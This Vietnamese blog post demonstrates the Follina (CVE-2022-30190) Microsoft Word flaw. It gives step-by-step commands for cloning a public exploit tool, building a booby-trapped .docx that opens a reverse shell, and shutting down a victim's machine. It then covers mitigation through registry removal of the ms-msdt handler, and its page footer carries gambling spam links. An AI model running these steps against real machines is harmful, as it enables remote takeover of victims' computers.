• Network
  • Security
  • Software
  • Thủ thuật
  • Tin tức
  • Video hướng dẫn
  • Donate – Mời AnonyViet ly Cafe ☕
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Demo cách Khai thác lỗ hổng Follina của Microsoft Word

Hevin by Hevin
in Basic Hacking
Reading Time: 5 mins read
A A
0

Mục lục bài viết

  1. Lỗ hổng Follina ( CVE-2022-30190 )
  2. Demo hacker khai thác lỗ hổng Follina 
  3. Cách phòng chống lỗ hổng Follina
  4. Bạn hãy sử dụng các phần mềm quét file tĩnh hoặc sử dụng Website Virustotal để scan nhé

Dạo gần đây, Microsoft đã công bố một lỗ hổng bảo mật mang tên Follina hay còn có tên gọi khác là CVE-2022-30190. Và cách thức khai thác như thế nào thì mình sẽ nói sau nha, bây giờ mình sẽ giới thiệu sơ qua về lỗ hổng này nhé!

Tham gia kênh Telegram của AnonyViet  👉 Link 👈

Lưu ý: Bài viết này chỉ mang tính chất giáo dục và demo lại cách tin tặc khai thác lỗ hổng Follina. Mọi hành vi bất hợp pháp được thực hiện qua bài viết này thì Anonyviet sẽ không chịu mọi trách nhiệm mà bạn gây ra

Các bài viết liên quan

tool scan xss Dalfox

Cách scan lỗ hổng XSS tự động với Dalfox

06/02/2023
Tự động chuyển văn bản vào Bảng trong Word 2

Tự động chuyển văn bản vào Bảng trong Word

25/10/2022
sua loi word khong mo duoc

Cách sửa lỗi File Word mở không được – Word experienced an error trying to open the file

17/10/2022
Các mẹo sử dụng Word

Top 4 mẹo về Word ai cũng phải nên biết khi đi làm

09/10/2022 - Updated on 10/10/2022

Bài viết này cũng không có gì đặc biệt lắm nên mình xin phép kết thúc bài viết sớm

Lỗ hổng Follina ( CVE-2022-30190 )

Follina CVE-2022-30190
Là một lỗ hổng được phát hiện trong Microsoft Word, là một lỗ hổng được thực thi mã lệnh từ xa bằng cách này các hacker có thể dễ dàng chiếm quyền điều khiển máy nạn nhân mà không gặp khó khăn. Không chỉ vậy các phần mềm diệt Virus cũng như AV trên Windows cũng bị lỗ hổng này vượt qua dễ dàng. Tính đến thời điểm hiện tại thì chưa có bản vá cho lỗ hổng này.

Chính vì vậy, các lượt khai thác lỗ hổng này càng ngày tăng lên rất nhanh và đương nhiên nguy cơ tấn công mạng là rất cao nhé. Vậy là mình đã giới thiệu sơ qua về lỗ hổng CVE-2022-30190 rồi ! Bạn nào muốn tìm hiểu chi tiết hơn về lỗ hổng này thì search Google ha ^^ Còn bây giờ mình sẽ Demo lại cho các bạn xem và nêu ra cách phòng chống lỗ hổng này nhé !

Demo hacker khai thác lỗ hổng Follina 

Hacker sẽ sử dụng công cụ MSDT-FOLLINA được xây dựng bởi tác giả JohnHammond, cách cài đặt như sau:

git clone https://github.com/JohnHammond/msdt-follina

cd msdt-follina

Các bạn nhập lệnh python3 follina.py -h để bản hướng dẫn nhé

Công cụ Follina

Hacker sẽ nhập lệnh sau để tạo ra một file Word có đuôi .docx hoặc .doc sau đó gửi cho nạn nhân kích hoạt: python3 follina.py -i wlan0 -o anonyviet.docx . Và khi nạn nhân kích hoạt vào file Word, thì trong file Word đó có đính kèm link HTML kết thúc bằng kí tự “!” và chứa đoạn mã JavaScript với giao thức ms-msdt://

Khai thác lỗ hổng Follina

Hacker sử dụng dòng lệnh sau để tạo ra file Word chiếm quyền điều khiển máy của nạn nhân: python3 follina.py -r 6677 -o anonyviet.docx Bây giờ hacker sẽ gửi file độc này cho nạn nhân, và khi nạn nhân kích hoạt hacker đã dễ dàng có quyền điều khiển máy bạn thông qua CMD trên Windows. Sau khi mà hacker điều khiển máy nạn nhân chán rồi thì nhập lệnh sau: shutdown -s -t -c "GoodBye Server".

Follina CVE-2022-30190

Cách phòng chống lỗ hổng Follina

Bạn hãy sử dụng các phần mềm quét file tĩnh hoặc sử dụng Website Virustotal để scan nhé

Nếu có dấu hiệu lạ trên máy của bạn thì bạn hãy mở Taskmanager sau đó kiểm tra xem có file msdt.exe đang chạy ko, và có thì bạn hãy tắt nhanh còn kịp =))

Ngoài ra bạn có thể sử dụng CMD để vô hiệu hóa:

Bước 1: Mở CMD với quyền Admin

Bước 2: chạy lệnh reg export HKEY_CLASSES_ROOT\ms-msdt filename để sao lưu registry key

Bước 3: chạy lệnh reg delete HKEY_CLASSES_ROOT\ms-msdt /f để vô hiệu hóa

Vậy là mình đã demo lại và nói sơ qua về lỗ hổng Follina cũng như cách phòng chống. Nếu bạn nào phát hiện cách phòng chống khác thì hãy bình luận ngay phía dưới để cho mình biết nhé. Và mình cũng mong rằng các bạn không nên sử dụng lỗ hổng này vào mục đích tấn công mạng thay vì đó bạn hãy thử test trên máy ảo sẽ tốt hơn đấy !

Bạn có thể đọc thêm bài viết Cảnh giác thủ đoạn đính kèm virus vào file word mới nhất 2022 tại Anonyviet nhé.

Bài viết đạt: 5/5 - (100 bình chọn)
Tags: cveCVE-2022-30190Follinakhai thác wordlỗ hổng bảo mậtWord
Hevin

Hevin

Related Posts

Cách Sao chép Chứng chỉ số từ App này sang App khác 3
Basic Hacking

Cách Sao chép Chứng chỉ số từ App này sang App khác

10/03/2023
code virus pha huy mbr o cung
Basic Hacking

Code phá hủy MBR ổ cứng – Tấn công và phòng chống

19/02/2023
tool scan xss Dalfox
Basic Hacking

Cách scan lỗ hổng XSS tự động với Dalfox

06/02/2023
HackingTool - Tổng hợp công cụ dành cho hacker
Basic Hacking

HackingTool – Tổng hợp tool hack dành cho hacker

10/01/2023 - Updated on 11/01/2023
osint truy vet gmail ghunt v2
Basic Hacking

Truy tìm chủ tài khoản Gmail bằng Ghunt V2 (Gmail OSINT)

19/12/2022
Lộ trình để trở thành Hacker thực thụ
Basic Hacking

Lộ trình để trở thành Hacker thực thụ

18/11/2022
Next Post
Cách nhận 800K từ ngân hàng VIB cực dễ bằng MyVIB 2.0 4

Cách nhận 800K từ ngân hàng VIB cực dễ bằng MyVIB 2.0

guest

guest

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

0 Comments
Inline Feedbacks
View all comments

Asia 300×600

Liên hệ Quảng Cáo

Lien he AnonyViet

Đối tác —

Fshare

Các bài mới

Mẹo tạo ra nhiều món lẩu hấp dẫn trong game Tiệm lẩu Đường Hạnh Phúc 5

Mẹo tạo ra nhiều món lẩu hấp dẫn trong game Tiệm lẩu Đường Hạnh Phúc

29/03/2023
Hướng dẫn đăng ký CCCD online ngay tại nhà 6

Hướng dẫn đăng ký CCCD online ngay tại nhà

29/03/2023
Cách chia sẻ file giữa Android/iOS và máy tính không cần phần mềm 7

Cách chia sẻ file giữa Android/iOS và máy tính không cần phần mềm

28/03/2023
Hướng dẫn tự tạo Bot ChatGPT trên Telegram 8

Hướng dẫn tự tạo Bot ChatGPT trên Telegram

27/03/2023
Cách sử dụng ChatGPT-4 miễn phí trên Chrome và FireFox 9

Cách sử dụng ChatGPT-4 miễn phí trên Chrome và FireFox

27/03/2023

Ads

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

Bản quyền: DMCA.com Protection Status

Phản hồi gần đây

  • Duy trong Cách sử dụng ChatGPT-4 miễn phí trên Chrome và FireFox
  • Yuuta trong Cách dùng AI của DALL-E 2 để tạo hình ảnh theo ý bạn
  • Clemo trong Download Driver Booster 10 Pro Full Key – Tải và cập nhật Driver tự động
  • AnonyViet trong Cách nâng cấp Google One 100GB giá chỉ 7000đ/tháng
  • Demon trong Cách đăng ký và sử dụng Google Bard – AI của Google
https://shbet8.org

©2023 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google Bing Github Github stackoverflow Youtube wikipedia reddit iwinclublink.app tải game iwin tải iwin apk tải tdtc w88 top tải win456 iwin888 ku11net.co ku fun twin F8BET https://new8869.com https://okuytin.com hi 88

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2023 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google Bing Github Github stackoverflow Youtube wikipedia reddit iwinclublink.app tải game iwin tải iwin apk tải tdtc w88 top tải win456 iwin888 ku11net.co ku fun twin F8BET https://new8869.com https://okuytin.com hi 88

wpDiscuz
!

Ads

Ads Blocker Detected!!! - Vui lòng tắt Ad Blocker!!!

Vui lòng tắt Ad Blocker

Có vẻ như bạn đang bật trình chặn Quảng cáo.

{Trường hợp bạn đang dùng trình duyệt từ Facebook, hãy copy link bài viết qua Chrome để xem nội dung, như vậy sẽ không bị chặn}

Website chúng tôi duy trì nhờ vào doanh thu quảng cáo, vì vậy hãy tắt trình chặn quảng cáo để chúng tôi có kinh phí chi trả tiền thuê Server, xin cảm ơn!

I've disable Adblock - Tôi đã tắt Adblock